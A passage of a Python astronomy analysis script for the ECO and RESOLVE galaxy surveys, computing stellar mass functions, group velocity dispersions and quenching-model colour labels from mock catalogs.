centers_red = 0.5 * (red_stellar_mass_bins[1:] + \
red_stellar_mass_bins[:-1])
centers_blue = 0.5 * (blue_stellar_mass_bins[1:] + \
blue_stellar_mass_bins[:-1])
return std_red, centers_red, std_blue, centers_blue
def get_sigma_per_group_data(df):
catl = df.copy()
if survey == 'eco' or survey == 'resolvea':
catl = catl.loc[catl.logmstar >= 8.9]
elif survey == 'resolveb':
catl = catl.loc[catl.logmstar >= 8.7]
catl.logmstar = np.log10((10**catl.logmstar) / 2.041)
red_subset_grpids = np.unique(catl.groupid.loc[(catl.\
colour_label == 'R') & (catl.g_galtype == 1)].values)
blue_subset_grpids = np.unique(catl.groupid.loc[(catl.\
colour_label == 'B') & (catl.g_galtype == 1)].values)
red_singleton_counter = 0
red_sigma_arr = []
red_cen_stellar_mass_arr = []
for key in red_subset_grpids:
group = catl.loc[catl.groupid == key]
if len(group) == 1:
red_singleton_counter += 1
else:
cen_stellar_mass = group.logmstar.loc[group.g_galtype\
.values == 1].values[0]
# Different velocity definitions
mean_cz_grp = np.round(np.mean(group.cz.values),2)
cen_cz_grp = group.cz.loc[group.g_galtype == 1].values[0]
# cz_grp = np.unique(group.grpcz.values)[0]
# Velocity difference
deltav = group.cz.values - len(group)*[mean_cz_grp]
# sigma = deltav[deltav!=0].std()
sigma = deltav.std()
red_sigma_arr.append(sigma)
red_cen_stellar_mass_arr.append(cen_stellar_mass)
blue_singleton_counter = 0
blue_sigma_arr = []
blue_cen_stellar_mass_arr = []
for key in blue_subset_grpids:
group = catl.loc[catl.groupid == key]
if len(group) == 1:
blue_singleton_counter += 1
else:
cen_stellar_mass = group.logmstar.loc[group.g_galtype\
.values == 1].values[0]
# Different velocity definitions
mean_cz_grp = np.round(np.mean(group.cz.values),2)
cen_cz_grp = group.cz.loc[group.g_galtype == 1].values[0]
# cz_grp = np.unique(group.grpcz.values)[0]
# Velocity difference
deltav = group.cz.values - len(group)*[mean_cz_grp]
# sigma = deltav[deltav!=0].std()
sigma = deltav.std()
blue_sigma_arr.append(sigma)
blue_cen_stellar_mass_arr.append(cen_stellar_mass)
mean_stats_red = bs(red_sigma_arr, red_cen_stellar_mass_arr,
statistic='mean', bins=np.linspace(0,250,6))
mean_stats_blue = bs(blue_sigma_arr, blue_cen_stellar_mass_arr,
statistic='mean', bins=np.linspace(0,250,6))
centers_red = 0.5 * (mean_stats_red[1][1:] + \
mean_stats_red[1][:-1])
centers_blue = 0.5 * (mean_stats_blue[1][1:] + \
mean_stats_blue[1][:-1])
return mean_stats_red, centers_red, mean_stats_blue, centers_blue
def diff_smf(mstar_arr, volume, h1_bool, colour_flag=False):
"""
Calculates differential stellar mass function in units of h=1.0
Parameters
----------
mstar_arr: numpy array
Array of stellar masses
volume: float
Volume of survey or simulation
h1_bool: boolean
True if units of masses are h=1, False if units of masses are not h=1
Returns
---------
maxis: array
Array of x-axis mass values
phi: array
Array of y-axis values
err_tot: array
Array of error values per bin
bins: array
Array of bin edge values
"""
if not h1_bool:
# changing from h=0.7 to h=1 assuming h^-2 dependence
logmstar_arr = np.log10((10**mstar_arr) / 2.041)
else:
logmstar_arr = np.log10(mstar_arr)
if survey == 'eco' or survey == 'resolvea':
bin_min = np.round(np.log10((10**8.9) / 2.041), 1)
if survey == 'eco' and colour_flag == 'R':
bin_max = np.round(np.log10((10**11.5) / 2.041), 1)
bin_num = 6
elif survey == 'eco' and colour_flag == 'B':
bin_max = np.round(np.log10((10**11) / 2.041), 1)
bin_num = 6
elif survey == 'resolvea':
# different to avoid nan in inverse corr mat
bin_max = np.round(np.log10((10**11.5) / 2.041), 1)
bin_num = 7
else:
bin_max = np.round(np.log10((10**11.5) / 2.041), 1)
bin_num = 7
bins = np.linspace(bin_min, bin_max, bin_num)
elif survey == 'resolveb':
bin_min = np.round(np.log10((10**8.7) / 2.041), 1)
bin_max = np.round(np.log10((10**11.8) / 2.041), 1)
bins = np.linspace(bin_min, bin_max, 7)
# Unnormalized histogram and bin edges
counts, edg = np.histogram(logmstar_arr, bins=bins) # paper used 17 bins
dm = edg[1] - edg[0] # Bin width
maxis = 0.5 * (edg[1:] + edg[:-1]) # Mass axis i.e. bin centers
# Normalized to volume and bin width
err_poiss = np.sqrt(counts) / (volume * dm)
err_tot = err_poiss
phi = counts / (volume * dm) # not a log quantity
phi = np.log10(phi)
return maxis, phi, err_tot, bins, counts
def get_err_smf_mocks(survey, path):
"""
Calculate error in data SMF from mocks
Parameters
----------
survey: string
Name of survey
path: string
Path to mock catalogs
Returns
---------
err_total: array
Standard deviation of phi values between all mocks and for all galaxies
err_red: array
Standard deviation of phi values between all mocks and for red galaxies
err_blue: array
Standard deviation of phi values between all mocks and for blue galaxies
"""
if survey == 'eco':
mock_name = 'ECO'
num_mocks = 8
min_cz = 3000
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 151829.26 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolvea':
mock_name = 'A'
num_mocks = 59
min_cz = 4500
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 13172.384 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolveb':
mock_name = 'B'
num_mocks = 104
min_cz = 4500
max_cz = 7000
mag_limit = -17
mstar_limit = 8.7
volume = 4709.8373 # Survey volume without buffer [Mpc/h]^3
phi_arr_total = []
phi_arr_red = []
phi_arr_blue = []
max_arr_red = []
max_arr_blue = []
colour_corr_mat_inv = []
box_id_arr = np.linspace(5001,5008,8)
for box in box_id_arr:
box = int(box)
temp_path = path + '{0}/{1}_m200b_catls/'.format(box,
mock_name)
for num in range(num_mocks):
filename = temp_path + '{0}_cat_{1}_Planck_memb_cat.hdf5'.format(
mock_name, num)
mock_pd = reading_catls(filename)
# Using the same survey definition as in mcmc smf i.e excluding the
# buffer
mock_pd = mock_pd.loc[(mock_pd.cz.values >= min_cz) & \
(mock_pd.cz.values <= max_cz) & (mock_pd.M_r.values <= mag_limit) &\
(mock_pd.logmstar.values >= mstar_limit)]
logmstar_arr = mock_pd.logmstar.values
u_r_arr = mock_pd.u_r.values
colour_label_arr = np.empty(len(mock_pd), dtype='str')
for idx, value in enumerate(logmstar_arr):
if value <= 9.1:
if u_r_arr[idx] > 1.457:
colour_label = 'R'
else:
colour_label = 'B'
elif value > 9.1 and value < 10.1:
divider = 0.24 * value - 0.7
if u_r_arr[idx] > divider:
colour_label = 'R'
else:
colour_label = 'B'
elif value >= 10.1:
if u_r_arr[idx] > 1.7:
colour_label = 'R'
else:
colour_label = 'B'
colour_label_arr[idx] = colour_label
mock_pd['colour_label'] = colour_label_arr
#Measure SMF of mock using diff_smf function
max_total, phi_total, err_total, bins_total, counts_total = \
diff_smf(logmstar_arr, volume, False)
max_red, phi_red, err_red, bins_red, counts_red = \
diff_smf(mock_pd.logmstar.loc[mock_pd.colour_label.values == 'R'],
volume, False, 'R')
max_blue, phi_blue, err_blue, bins_blue, counts_blue = \
diff_smf(mock_pd.logmstar.loc[mock_pd.colour_label.values == 'B'],
volume, False, 'B')
phi_arr_total.append(phi_total)
phi_arr_red.append(phi_red)
phi_arr_blue.append(phi_blue)
max_arr_red.append(max_red)
max_arr_blue.append(max_blue)
phi_arr_total = np.array(phi_arr_total)
phi_arr_red = np.array(phi_arr_red)
phi_arr_blue = np.array(phi_arr_blue)
max_arr_red = np.array(max_arr_red)
max_arr_blue = np.array(max_arr_blue)
# Covariance matrix for total phi (all galaxies)
cov_mat = np.cov(phi_arr_total, rowvar=False) # default norm is N-1
err_total = np.sqrt(cov_mat.diagonal())
return phi_arr_red, phi_arr_blue
def get_deltav_sigma_mocks_urcolour(survey, path):
"""
Calculate spread in velocity dispersion from survey mocks
Parameters
----------
survey: string
Name of survey
path: string
Path to mock catalogs
Returns
---------
std_red_arr: numpy array
Spread in velocity dispersion of red galaxies
centers_red_arr: numpy array
Bin centers of central stellar mass for red galaxies
std_blue_arr: numpy array
Spread in velocity dispersion of blue galaxies
centers_blue_arr: numpy array
Bin centers of central stellar mass for blue galaxies
"""
if survey == 'eco':
mock_name = 'ECO'
num_mocks = 8
min_cz = 3000
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 151829.26 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolvea':
mock_name = 'A'
num_mocks = 59
min_cz = 4500
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 13172.384 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolveb':
mock_name = 'B'
num_mocks = 104
min_cz = 4500
max_cz = 7000
mag_limit = -17
mstar_limit = 8.7
volume = 4709.8373 # Survey volume without buffer [Mpc/h]^3
std_red_arr = []
centers_red_arr = []
std_blue_arr = []
centers_blue_arr = []
box_id_arr = np.linspace(5001,5008,8)
for box in box_id_arr:
box = int(box)
temp_path = path + '{0}/{1}_m200b_catls/'.format(box,
mock_name)
for num in range(num_mocks):
filename = temp_path + '{0}_cat_{1}_Planck_memb_cat.hdf5'.format(
mock_name, num)
mock_pd = reading_catls(filename)
# Using the same survey definition as in mcmc smf i.e excluding the
# buffer
mock_pd = mock_pd.loc[(mock_pd.cz.values >= min_cz) & \
(mock_pd.cz.values <= max_cz) & \
(mock_pd.M_r.values <= mag_limit) & \
(mock_pd.logmstar.values >= mstar_limit)]
logmstar_arr = mock_pd.logmstar.values
u_r_arr = mock_pd.u_r.values
colour_label_arr = np.empty(len(mock_pd), dtype='str')
# Using defintions from Moffett paper
for idx, value in enumerate(logmstar_arr):
if value <= 9.1:
if u_r_arr[idx] > 1.457:
colour_label = 'R'
else:
colour_label = 'B'
elif value > 9.1 and value < 10.1:
divider = 0.24 * value - 0.7
if u_r_arr[idx] > divider:
colour_label = 'R'
else:
colour_label = 'B'
elif value >= 10.1:
if u_r_arr[idx] > 1.7:
colour_label = 'R'
else:
colour_label = 'B'
colour_label_arr[idx] = colour_label
mock_pd['colour_label'] = colour_label_arr
mock_pd.logmstar = np.log10((10**mock_pd.logmstar) / 2.041)
red_subset_grpids = np.unique(mock_pd.groupid.loc[(mock_pd.\
colour_label == 'R') & (mock_pd.g_galtype == 1)].values)
blue_subset_grpids = np.unique(mock_pd.groupid.loc[(mock_pd.\
colour_label == 'B') & (mock_pd.g_galtype == 1)].values)
# Calculating spread in velocity dispersion for galaxies in groups
# with a red central
red_deltav_arr = []
red_cen_stellar_mass_arr = []
for key in red_subset_grpids:
group = mock_pd.loc[mock_pd.groupid == key]
cen_stellar_mass = group.logmstar.loc[group.g_galtype.\
values == 1].values[0]
mean_cz_grp = np.round(np.mean(group.cz.values),2)
deltav = group.cz.values - len(group)*[mean_cz_grp]
for val in deltav:
red_deltav_arr.append(val)
red_cen_stellar_mass_arr.append(cen_stellar_mass)
# print(max(red_cen_stellar_mass_arr))
if survey == 'eco' or survey == 'resolvea':
# TODO : check if this is actually correct for resolve a
red_stellar_mass_bins = np.linspace(8.6,11.5,6)
elif survey == 'resolveb':
red_stellar_mass_bins = np.linspace(8.4,11.0,6)
std_red = std_func(red_stellar_mass_bins, red_cen_stellar_mass_arr,
red_deltav_arr)
std_red = np.array(std_red)
std_red_arr.append(std_red)
# Calculating spread in velocity dispersion for galaxies in groups
# with a blue central
blue_deltav_arr = []
blue_cen_stellar_mass_arr = []
for key in blue_subset_grpids:
group = mock_pd.loc[mock_pd.groupid == key]
cen_stellar_mass = group.logmstar.loc[group.g_galtype\
.values == 1].values[0]
mean_cz_grp = np.round(np.mean(group.cz.values),2)
deltav = group.cz.values - len(group)*[mean_cz_grp]
for val in deltav:
blue_deltav_arr.append(val)
blue_cen_stellar_mass_arr.append(cen_stellar_mass)
# print(max(blue_cen_stellar_mass_arr))
if survey == 'eco' or survey == 'resolvea':
# TODO : check if this is actually correct for resolve a
blue_stellar_mass_bins = np.linspace(8.6,10.5,6)
elif survey == 'resolveb':
blue_stellar_mass_bins = np.linspace(8.4,10.4,6)
std_blue = std_func(blue_stellar_mass_bins, \
blue_cen_stellar_mass_arr, blue_deltav_arr)
std_blue = np.array(std_blue)
std_blue_arr.append(std_blue)
centers_red = 0.5 * (red_stellar_mass_bins[1:] + \
red_stellar_mass_bins[:-1])
centers_blue = 0.5 * (blue_stellar_mass_bins[1:] + \
blue_stellar_mass_bins[:-1])
centers_red_arr.append(centers_red)
centers_blue_arr.append(centers_blue)
std_red_arr = np.array(std_red_arr)
centers_red_arr = np.array(centers_red_arr)
std_blue_arr = np.array(std_blue_arr)
centers_blue_arr = np.array(centers_blue_arr)
return std_red_arr, std_blue_arr, centers_red_arr, centers_blue_arr
def get_deltav_sigma_mocks_qmcolour_mod(survey, path):
"""
Calculate spread in velocity dispersion from survey mocks
Parameters
----------
survey: string
Name of survey
path: string
Path to mock catalogs
Returns
---------
std_red_arr: numpy array
Spread in velocity dispersion of red galaxies
centers_red_arr: numpy array
Bin centers of central stellar mass for red galaxies
std_blue_arr: numpy array
Spread in velocity dispersion of blue galaxies
centers_blue_arr: numpy array
Bin centers of central stellar mass for blue galaxies
"""
if survey == 'eco':
mock_name = 'ECO'
num_mocks = 8
min_cz = 3000
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 151829.26 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolvea':
mock_name = 'A'
num_mocks = 59
min_cz = 4500
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 13172.384 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolveb':
mock_name = 'B'
num_mocks = 104
min_cz = 4500
max_cz = 7000
mag_limit = -17
mstar_limit = 8.7
volume = 4709.8373 # Survey volume without buffer [Mpc/h]^3
std_red_arr = []
centers_red_arr = []
std_blue_arr = []
centers_blue_arr = []
box_id_arr = np.linspace(5001,5008,8)
for box in box_id_arr:
box = int(box)
temp_path = path + '{0}/{1}_m200b_catls/'.format(box,
mock_name)
for num in range(num_mocks):
filename = temp_path + '{0}_cat_{1}_Planck_memb_cat.hdf5'.format(
mock_name, num)
mock_pd = reading_catls(filename)
# Using the same survey definition as in mcmc smf i.e excluding the
# buffer
mock_pd = mock_pd.loc[(mock_pd.cz.values >= min_cz) & \
(mock_pd.cz.values <= max_cz) & \
(mock_pd.M_r.values <= mag_limit) & \
(mock_pd.logmstar.values >= mstar_limit)]
f_red_c, f_red_s = hybrid_quenching_model(mock_pd)
mock_pd = assign_colour_label_mock(f_red_c, f_red_s, mock_pd)
mock_pd.logmstar = np.log10((10**mock_pd.logmstar) / 2.041)
red_subset_grpids = np.unique(mock_pd.groupid.loc[(mock_pd.\
colour_label == 'R') & (mock_pd.g_galtype == 1)].values)
blue_subset_grpids = np.unique(mock_pd.groupid.loc[(mock_pd.\
colour_label == 'B') & (mock_pd.g_galtype == 1)].values)
# Calculating spread in velocity dispersion for galaxies in groups
# with a red central
red_deltav_arr = []
red_cen_stellar_mass_arr = []
for key in red_subset_grpids:
group = mock_pd.loc[mock_pd.groupid == key]
cen_stellar_mass = group.logmstar.loc[group.g_galtype.\
values == 1].values[0]
mean_cz_grp = np.round(np.mean(group.cz.values),2)
deltav = group.cz.values - len(group)*[mean_cz_grp]
for val in deltav:
red_deltav_arr.append(val)
red_cen_stellar_mass_arr.append(cen_stellar_mass)
# print(max(red_cen_stellar_mass_arr))
if survey == 'eco' or survey == 'resolvea':
# TODO : check if this is actually correct for resolve a
red_stellar_mass_bins = np.linspace(8.6,11.2,6)
elif survey == 'resolveb':
red_stellar_mass_bins = np.linspace(8.4,11.0,6)
std_red = std_func(red_stellar_mass_bins, red_cen_stellar_mass_arr,
red_deltav_arr)
std_red = np.array(std_red)
std_red_arr.append(std_red)
# Calculating spread in velocity dispersion for galaxies in groups
# with a blue central
blue_deltav_arr = []
blue_cen_stellar_mass_arr = []
for key in blue_subset_grpids:
group = mock_pd.loc[mock_pd.groupid == key]
cen_stellar_mass = group.logmstar.loc[group.g_galtype\
.values == 1].values[0]
mean_cz_grp = np.round(np.mean(group.cz.values),2)
deltav = group.cz.values - len(group)*[mean_cz_grp]
for val in deltav:
blue_deltav_arr.append(val)
blue_cen_stellar_mass_arr.append(cen_stellar_mass)
# print(max(blue_cen_stellar_mass_arr))
if survey == 'eco' or survey == 'resolvea':
# TODO : check if this is actually correct for resolve a
blue_stellar_mass_bins = np.linspace(8.6,10.7,6)
elif survey == 'resolveb':
blue_stellar_mass_bins = np.linspace(8.4,10.4,6)
std_blue = std_func(blue_stellar_mass_bins, \
blue_cen_stellar_mass_arr, blue_deltav_arr)
std_blue = np.array(std_blue)
std_blue_arr.append(std_blue)
centers_red = 0.5 * (red_stellar_mass_bins[1:] + \
red_stellar_mass_bins[:-1])
centers_blue = 0.5 * (blue_stellar_mass_bins[1:] + \
blue_stellar_mass_bins[:-1])
centers_red_arr.append(centers_red)
centers_blue_arr.append(centers_blue)
std_red_arr = np.array(std_red_arr)
centers_red_arr = np.array(centers_red_arr)
std_blue_arr = np.array(std_blue_arr)
centers_blue_arr = np.array(centers_blue_arr)
return std_red_arr, std_blue_arr, centers_red_arr, centers_blue_arr
def get_deltav_sigma_mocks_qmcolour(survey, mock_df):
"""
Calculate spread in velocity dispersion from survey mocks (logmstar converted
to h=1 units before analysis)
Parameters
----------
survey: string
Name of survey
path: string
Path to mock catalogs
Returns
---------
std_red_arr: numpy array
Spread in velocity dispersion of red galaxies
centers_red_arr: numpy array
Bin centers of central stellar mass for red galaxies
std_blue_arr: numpy array
Spread in velocity dispersion of blue galaxies
centers_blue_arr: numpy array
Bin centers of central stellar mass for blue galaxies
"""
mock_pd = mock_df.copy()
mock_pd.logmstar = np.log10((10**mock_pd.logmstar) / 2.041)
red_subset_grpids = np.unique(mock_pd.groupid.loc[(mock_pd.\
colour_label == 'R') & (mock_pd.g_galtype == 1)].values)
blue_subset_grpids = np.unique(mock_pd.groupid.loc[(mock_pd.\
colour_label == 'B') & (mock_pd.g_galtype == 1)].values)
# Calculating spread in velocity dispersion for galaxies in groups
# with a red central
red_deltav_arr = []
red_cen_stellar_mass_arr = []
for key in red_subset_grpids:
group = mock_pd.loc[mock_pd.groupid == key]
cen_stellar_mass = group.logmstar.loc[group.g_galtype.\
values == 1].values[0]
mean_cz_grp = np.round(np.mean(group.cz.values),2)
deltav = group.cz.values - len(group)*[mean_cz_grp]
for val in deltav:
red_deltav_arr.append(val)
red_cen_stellar_mass_arr.append(cen_stellar_mass)
# print(max(red_cen_stellar_mass_arr))
if survey == 'eco' or survey == 'resolvea':
# TODO : check if this is actually correct for resolve a
red_stellar_mass_bins = np.linspace(8.6,11.2,6)
elif survey == 'resolveb':
red_stellar_mass_bins = np.linspace(8.4,11.0,6)
std_red = std_func_mod(red_stellar_mass_bins, red_cen_stellar_mass_arr,
red_deltav_arr)
std_red = np.array(std_red)
# Calculating spread in velocity dispersion for galaxies in groups
# with a blue central
blue_deltav_arr = []
blue_cen_stellar_mass_arr = []
for key in blue_subset_grpids:
group = mock_pd.loc[mock_pd.groupid == key]
cen_stellar_mass = group.logmstar.loc[group.g_galtype\
.values == 1].values[0]
mean_cz_grp = np.round(np.mean(group.cz.values),2)
deltav = group.cz.values - len(group)*[mean_cz_grp]
for val in deltav:
blue_deltav_arr.append(val)
blue_cen_stellar_mass_arr.append(cen_stellar_mass)
# print(max(blue_cen_stellar_mass_arr))
if survey == 'eco' or survey == 'resolvea':
# TODO : check if this is actually correct for resolve a
blue_stellar_mass_bins = np.linspace(8.6,10.7,6)
elif survey == 'resolveb':
blue_stellar_mass_bins = np.linspace(8.4,10.4,6)
std_blue = std_func_mod(blue_stellar_mass_bins, \
blue_cen_stellar_mass_arr, blue_deltav_arr)
std_blue = np.array(std_blue)
centers_red = 0.5 * (red_stellar_mass_bins[1:] + \
red_stellar_mass_bins[:-1])
centers_blue = 0.5 * (blue_stellar_mass_bins[1:] + \
blue_stellar_mass_bins[:-1])
centers_red = np.array(centers_red)
centers_blue = np.array(centers_blue)
return std_red, std_blue, centers_red, centers_blue
def get_host_halo_mock(gals_df, mock):
"""
Get host halo mass from mock catalog
Parameters
----------
gals_df: pandas dataframe
Mock catalog
Returns
---------
cen_halos: array
Array of central host halo masses
sat_halos: array
Array of satellite host halo masses
"""
df = gals_df.copy()
# groups = df.groupby('halo_id')
# keys = groups.groups.keys()
# for key in keys:
# group = groups.get_group(key)
# for index, value in enumerate(group.cs_flag):
# if value == 1:
# cen_halos.append(group.loghalom.values[index])
# else:
# sat_halos.append(group.loghalom.values[index])
if mock == 'vishnu':
cen_halos = []
sat_halos = []
for index, value in enumerate(df.cs_flag):
if value == 1:
cen_halos.append(df.halo_mvir.values[index])
else:
sat_halos.append(df.halo_mvir.values[index])
else:
cen_halos = []
sat_halos = []
for index, value in enumerate(df.cs_flag):
if value == 1:
cen_halos.append(10**(df.loghalom.values[index]))
else:
sat_halos.append(10**(df.loghalom.values[index]))
cen_halos = np.array(cen_halos)
sat_halos = np.array(sat_halos)
return cen_halos, sat_halos
def get_stellar_mock(gals_df, mock, randint=None):
"""
Get stellar mass from mock catalog
Parameters
----------
gals_df: pandas dataframe
Mock catalog
Returns
---------
cen_gals: array
Array of central stellar masses
sat_gals: array
Array of satellite stellar masses
"""
df = gals_df.copy()
if mock == 'vishnu':
cen_gals = []
sat_gals = []
for idx,value in enumerate(df.cs_flag):
if value == 1:
cen_gals.append(10**(df['{0}'.format(randint)].values[idx]))
elif value == 0:
sat_gals.append(10**(df['{0}'.format(randint)].values[idx]))
else:
cen_gals = []
sat_gals = []
for idx,value in enumerate(df.cs_flag):
if value == 1:
cen_gals.append((10**(df.logmstar.values[idx]))/2.041)
elif value == 0:
sat_gals.append((10**(df.logmstar.values[idx]))/2.041)
cen_gals = np.array(cen_gals)
sat_gals = np.array(sat_gals)
return cen_gals, sat_gals
def hybrid_quenching_model(theta, gals_df, mock, randint=None):
"""
Apply hybrid quenching model from Zu and Mandelbaum 2015
Parameters
----------
gals_df: pandas dataframe
Mock catalog
Returns
---------
f_red_cen: array
Array of central red fractions
f_red_sat: array
Array of satellite red fractions
"""
# parameter values from Table 1 of Zu and Mandelbaum 2015 "prior case"
Mstar_q = theta[0] # Msun/h
Mh_q = theta[1] # Msun/h
mu = theta[2]
nu = theta[3]
cen_hosthalo_mass_arr, sat_hosthalo_mass_arr = get_host_halo_mock(gals_df, \
mock)
cen_stellar_mass_arr, sat_stellar_mass_arr = get_stellar_mock(gals_df, mock, \
randint)
f_red_cen = 1 - np.exp(-((cen_stellar_mass_arr/(10**Mstar_q))**mu))
g_Mstar = np.exp(-((sat_stellar_mass_arr/(10**Mstar_q))**mu))
h_Mh = np.exp(-((sat_hosthalo_mass_arr/(10**Mh_q))**nu))
f_red_sat = 1 - (g_Mstar * h_Mh)
return f_red_cen, f_red_sat
def assign_colour_label_mock(f_red_cen, f_red_sat, gals_df, drop_fred=False):
"""
Assign colour label to mock catalog
Parameters
----------
f_red_cen: array
Array of central red fractions
f_red_sat: array
Array of satellite red fractions
gals_df: pandas Dataframe
Mock catalog
drop_fred: boolean
Whether or not to keep red fraction column after colour has been
assigned
Returns
---------
df: pandas Dataframe
Dataframe with colour label and random number assigned as
new columns
"""
# Copy of dataframe
df = gals_df.copy()
# Saving labels
color_label_arr = [[] for x in range(len(df))]
rng_arr = [[] for x in range(len(df))]
# Adding columns for f_red to df
df.loc[:, 'f_red'] = np.zeros(len(df))
df.loc[df['cs_flag'] == 1, 'f_red'] = f_red_cen
df.loc[df['cs_flag'] == 0, 'f_red'] = f_red_sat
# Converting to array
f_red_arr = df['f_red'].values
# Looping over galaxies
for ii, cs_ii in enumerate(df['cs_flag']):
# Draw a random number
rng = np.random.uniform()
# Comparing against f_red
if (rng >= f_red_arr[ii]):
color_label = 'B'
else:
color_label = 'R'
# Saving to list
color_label_arr[ii] = color_label
rng_arr[ii] = rng
## Assigning to DataFrame
df.loc[:, 'colour_label'] = color_label_arr
df.loc[:, 'rng'] = rng_arr
# Dropping 'f_red` column
if drop_fred:
df.drop('f_red', axis=1, inplace=True)
return df
def get_sigma_per_group_mocks_qmcolour(survey, mock_df):
"""
Calculate spread in velocity dispersion from survey mocks (logmstar converted
to h=1 units before analysis)
Parameters
----------
survey: string
Name of survey
path: string
Path to mock catalogs
Returns
---------
std_red_arr: numpy array
Spread in velocity dispersion of red galaxies
centers_red_arr: numpy array
Bin centers of central stellar mass for red galaxies
std_blue_arr: numpy array
Spread in velocity dispersion of blue galaxies
centers_blue_arr: numpy array
Bin centers of central stellar mass for blue galaxies
"""
mock_pd = mock_df.copy()
mock_pd.logmstar = np.log10((10**mock_pd.logmstar) / 2.041)
red_subset_grpids = np.unique(mock_pd.groupid.loc[(mock_pd.\
colour_label == 'R') & (mock_pd.g_galtype == 1)].values)
blue_subset_grpids = np.unique(mock_pd.groupid.loc[(mock_pd.\
colour_label == 'B') & (mock_pd.g_galtype == 1)].values)
red_singleton_counter = 0
red_sigma_arr = []
red_cen_stellar_mass_arr = []
for key in red_subset_grpids:
group = mock_pd.loc[mock_pd.groupid == key]
if len(group) == 1:
red_singleton_counter += 1
else:
cen_stellar_mass = group.logmstar.loc[group.g_galtype\
.values == 1].values[0]
# Different velocity definitions
mean_cz_grp = np.round(np.mean(group.cz.values),2)
cen_cz_grp = group.cz.loc[group.g_galtype == 1].values[0]
# cz_grp = np.unique(group.grpcz.values)[0]
# Velocity difference
deltav = group.cz.values - len(group)*[mean_cz_grp]
# sigma = deltav[deltav!=0].std()
sigma = deltav.std()
red_sigma_arr.append(sigma)
red_cen_stellar_mass_arr.append(cen_stellar_mass)
blue_singleton_counter = 0
blue_sigma_arr = []
blue_cen_stellar_mass_arr = []
for key in blue_subset_grpids:
group = mock_pd.loc[mock_pd.groupid == key]
if len(group) == 1:
blue_singleton_counter += 1
else:
cen_stellar_mass = group.logmstar.loc[group.g_galtype\
.values == 1].values[0]
# Different velocity definitions
mean_cz_grp = np.round(np.mean(group.cz.values),2)
cen_cz_grp = group.cz.loc[group.g_galtype == 1].values[0]
# cz_grp = np.unique(group.grpcz.values)[0]
# Velocity difference
deltav = group.cz.values - len(group)*[mean_cz_grp]
# sigma = deltav[deltav!=0].std()
sigma = deltav.std()
blue_sigma_arr.append(sigma)
blue_cen_stellar_mass_arr.append(cen_stellar_mass)
mean_stats_red = bs(red_sigma_arr, red_cen_stellar_mass_arr,
statistic='mean', bins=np.linspace(0,250,6))
mean_stats_blue = bs(blue_sigma_arr, blue_cen_stellar_mass_arr,
statistic='mean', bins=np.linspace(0,250,6))
centers_red = 0.5 * (mean_stats_red[1][1:] + \
mean_stats_red[1][:-1])
centers_blue = 0.5 * (mean_stats_blue[1][1:] + \
mean_stats_blue[1][:-1])
return mean_stats_red, centers_red, mean_stats_blue, centers_blue
def get_err_data_mod(survey, path):
"""
Calculate error in data SMF from mocks
Parameters
----------
survey: string
Name of survey
path: string
Path to mock catalogs
Returns
---------
err_total: array
Standard deviation of phi values between all mocks and for all galaxies
err_red: array
Standard deviation of phi values between all mocks and for red galaxies
err_blue: array
Standard deviation of phi values between all mocks and for blue galaxies
"""
if survey == 'eco':
mock_name = 'ECO'
num_mocks = 8
min_cz = 3000
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 151829.26 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolvea':
mock_name = 'A'
num_mocks = 59
min_cz = 4500
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 13172.384 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolveb':
mock_name = 'B'
num_mocks = 104
min_cz = 4500
max_cz = 7000
mag_limit = -17
mstar_limit = 8.7
volume = 4709.8373 # Survey volume without buffer [Mpc/h]^3
phi_arr_total = []
phi_arr_red = []
phi_arr_blue = []
sig_arr_red = []
sig_arr_blue = []
cen_arr_red = []
cen_arr_blue = []
mean_cen_arr_red = []
mean_cen_arr_blue = []
new_sig_arr_red = []
new_sig_arr_blue = []
box_id_arr = np.linspace(5001,5008,8)
subset_counter = 0
while subset_counter < 15:
print(subset_counter)
# for box in box_id_arr:
box = random.randint(5001,5008)
num = random.randint(0,7)
# box = int(box)
temp_path = path + '{0}/{1}_m200b_catls/'.format(box,
mock_name)
# for num in range(num_mocks):
filename = temp_path + '{0}_cat_{1}_Planck_memb_cat.hdf5'.format(
mock_name, num)
mock_pd = reading_catls(filename)
# Using the same survey definition as in mcmc smf i.e excluding the
# buffer
mock_pd = mock_pd.loc[(mock_pd.cz.values >= min_cz) & \
(mock_pd.cz.values <= max_cz) & (mock_pd.M_r.values <= mag_limit) &\
(mock_pd.logmstar.values >= mstar_limit)]
# ## Using best-fit found for old ECO data using optimize_hybridqm_eco,py
# Mstar_q = 10.39 # Msun/h
# Mh_q = 14.85 # Msun/h
# mu = 0.65
# nu = 0.16
## Using best-fit found for new ECO data using optimize_qm_eco.py
## for hybrid quenching model
Mstar_q = 10.49 # Msun/h
Mh_q = 14.03 # Msun/h
mu = 0.69
nu = 0.148
## Using best-fit found for new ECO data using optimize_qm_eco.py
## for halo quenching model
Mh_qc = 12.61 # Msun/h
Mh_qs = 13.5 # Msun/h
mu_c = 0.40
mu_s = 0.148
if quenching == 'hybrid':
theta = [Mstar_q, Mh_q, mu, nu]
f_red_c, f_red_s = hybrid_quenching_model(theta, mock_pd, 'nonvishnu')
elif quenching == 'halo':
theta = [Mh_qc, Mh_qs, mu_c, mu_s]
f_red_c, f_red_s = hybrid_quenching_model(theta, mock_pd, 'nonvishnu')
mock_pd = assign_colour_label_mock(f_red_c, f_red_s, mock_pd)
# logmstar_red_max = mock_pd.logmstar.loc[mock_pd.colour_label == 'R'].max()
# logmstar_red_max_arr.append(logmstar_red_max)
# logmstar_blue_max = mock_pd.logmstar.loc[mock_pd.colour_label == 'B'].max()
# logmstar_blue_max_arr.append(logmstar_blue_max)
